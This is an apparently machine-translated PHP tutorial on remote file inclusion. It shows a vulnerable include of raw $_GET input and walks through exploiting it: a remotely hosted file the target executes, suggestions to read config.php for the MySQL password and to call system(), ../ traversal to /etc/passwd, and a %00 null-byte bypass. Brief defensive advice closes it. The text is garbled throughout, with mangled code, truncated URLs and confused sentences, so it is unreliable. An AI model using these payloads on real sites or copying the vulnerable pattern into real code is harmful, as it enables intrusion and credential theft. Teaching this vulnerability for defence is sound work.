Discussion on the reason of PHP remote file containing vulnerability _php tutorial

For primary

The first question is, what is a "remote file Containment vulnerability"? The short answer is that the server through the PHP arbitrary file contains the filter is not strict, to execute a malicious file, which is a programmer filtering problems, please remember that all CGI programs have such a bug.

1. Find out the PHP remote file contains the vulnerability bug:

In order to find the goal, we first need to know the meaning of two words, in all languages (most) have this method contains arbitrary files. In PHP, we use the Include () function, its workflow:

If you include include1.php in main.php, I will write the include ("Include1. PHP "). Not very scientific, but you need to know the truth.
Let's look at this first, and when the user enters it, it includes the file, which is

 
  
  

  
   
   
if ($_get
) { 
  
   
   
Include $_get
; 
  
   
   
} else { 
  
   
   
include "home. PHP"; 
  
   
   

 
  
  

This structure is common in dynamic Web sites, and the problem is that it allows such [Url]http://www.target.com/explame. Php?page=main. Php[/url] or [Url]http://www.target.com/explame. Php?page=downloads. Php[/url] to view. Anyway, if your program has such a bug is also very sad, can only blame you, although only a filter problem, but this is the filter has a script hacker. In the zone-h.org survey, the file contains an attack rate of 9.4%, enough to attract attention, And it is not a day or two problems, a few years ago, but to today, a batch of programmers still usual, so there is this article, in 2004 to write such an article has been old, but I still want to write, after all, complaints can make a person's profit when it is not called whining.

2. Testing

Here is a remote file containing examples, the purpose is only one, for your program security, we look at the specific

[Url]http://www.target.com/explame.php?page=zizzy[/url]

Warning:main (Zizzy): Failed to open stream:no such file or directory In/var/www/htdocs/index. PHP on line 3
Warning:main (): Failed opening ' zizzy ' for inclusion (include_path= '.:/ Usr/local/lib/php ') In/var/www/htdocs/index. PHP on line 3

PHP output of these error message tells us that the program to include the file/var/www/htdocs/zizzy, but did not find, see, no such file or directory does not have such files, now understand the PHP remote file contains the vulnerability.

3. Use

PHP is really good, can call the file remotely, then I create a yeah.txt, put on my station [Url]http://www.mysite.com/yeah.txt. [/URL] content like this

 
  
  

  
   
   
<  ? 
  
   
   
echo "wow,test!"; 
  
   
   
?>
 
  
  

So [Url]http://www.target.com/explame.php?pa...e.com/yeah.txt[/url]
OK, Echo wow,test!, so it executes. Read CONFIG. PHP is not difficult, it put the MySQL password ah. Write yeah.txt to see, write System () to try, what feelings, in the excessive point, so submit page=. /.. /.. /.. /.. /.. /.. /etc/passwd. Know what is really contained.

4. Another type of PHP remote file contains the vulnerability principle

Sometimes programmers change the way they are written, which limits the scope of inclusion

 
  
  

  
   
   
if ($_get
) { 
  
   
   
Include "$_get
. PHP"; 
  
   
   
} else { 
  
   
   
include "home. PHP"; 
  
   
   

 
  
  

We submit [Url]http://www.target.com/explame.php?pa...e.com/yeah.txt[/url]

Warning:main ([Url]http://www.mysite.com/yeah.txt.php[/url]): Failed to open stream:http request failed! http/1.1 404 Not Found in/var/www/htdocs/explame. PHP on line 3

Warning:main (): Failed opening ' Http://www.mysite.com/yeah.txt.PHP ' for inclusion (include_path= '.:/ Usr/local/lib/php ') in/var/www/htdocs/explame. PHP on line 3

Included failed, limited suffix named PHP, that mysite.com Yeah.txt changed to Yeah.php,ok, so executed
What about the passwd?

Warning:main (.. /.. /.. /.. /.. /.. /.. /etc/passwd. PHP): Failed to open stream:http request failed! http/1.1 404 Not Found in/var/www/htdocs/explame. PHP on line 3

Warning:main (): Failed opening '. /.. /.. /.. /.. /.. /.. /etc/passwd. PHP ' for inclusion (include_path= '.:/ Usr/local/lib/php ') in/var/www/htdocs/explame. PHP on line 3

Use a NUL character here, which is the% 00来 skip detection

[Url]http://www.target.com/explame.php?pa.../etc/passwd%00[/url]

See it.

5. Recommendations

It is best to specify which file to include in the file, or to filter the submitted variables, which is the purpose of this PHP remote file contains the vulnerability article, not to the hacking, but to those who are involved in the first programmer, such articles on the Internet a lot, as long as someone benefit, also to achieve the purpose.

http://www.bkjia.com/PHPjc/446010.html www.bkjia.com true http://www.bkjia.com/PHPjc/446010.html techarticle the first question for beginners is, what is a remote file containment vulnerability? The short answer is that the server through the PHP arbitrary file contains the filter is not strict, thus go to execute a malicious file, this ...

